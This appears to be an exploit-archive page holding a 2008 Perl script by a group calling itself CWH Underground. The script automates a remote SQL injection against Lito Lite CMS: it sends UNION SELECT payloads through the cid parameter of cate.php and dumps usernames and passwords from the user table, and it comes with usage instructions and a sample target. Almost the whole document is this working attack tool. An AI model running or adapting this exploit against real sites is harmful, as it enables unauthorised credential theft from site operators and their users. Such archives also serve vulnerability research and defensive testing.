[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
# Published : 2008-11-29
# Author : CWH Underground
# Previous Title : Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability
# Next Title : Active Test 2.1 (QuizID) Blind SQL Injection Vulnerability
#!/usr/bin/perl -w
#===========================================================
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
#===========================================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / ` /
# / XXXXXX /______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : Lito Lite CMS
#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#######################################################################################
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################
use LWP::UserAgent;
use HTTP::Request;
if ($#ARGV+1 != 2)
{
print "n==============================================n";
print " Lito Lite Remote SQL Injection Exploit n";
print " n";
print " Discovered By CWH Underground n";
print "==============================================n";
print " n";
print " ,--^----------,--------,-----,-------^--, n";
print " | ||||||||| `--------' | O n";
print " `+---------------------------^----------| n";
print " `_,-------, _________________________| n";
print " / XXXXXX /`| / n";
print " / XXXXXX / ` / n";
print " / XXXXXX /______( n";
print " / XXXXXX / n";
print " / XXXXXX / .. CWH Underground Hacking Team .. n";
print " (________( n";
print " `------' n";
print " n";
print "Usage : ./xpl.pl <Target> <Data Limit>n";
print "Example: ./xpl.pl http://www.target.com/lito_lite 10n";
exit();
}
$target = ($ARGV[0] =~ /^http:///) ? $ARGV[0]: 'http://' . $ARGV[0];
$number = $ARGV[1];
print "n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "n ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "n++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print "n[+]Dump Username and Passwordn";
for ($start=0;$start<$number;$start++) {
$xpl = LWP::UserAgent->new() or die "Could not initialize browsern";
$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;
if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "n [$count]n [!]Username = $username n [!]Password = $passwordn";
}
else {
print "n [*]Exploit Done !!" or die "n [*]Exploit Failed !!n";
exit;
}
}
# www.Syue.com [2008-11-29]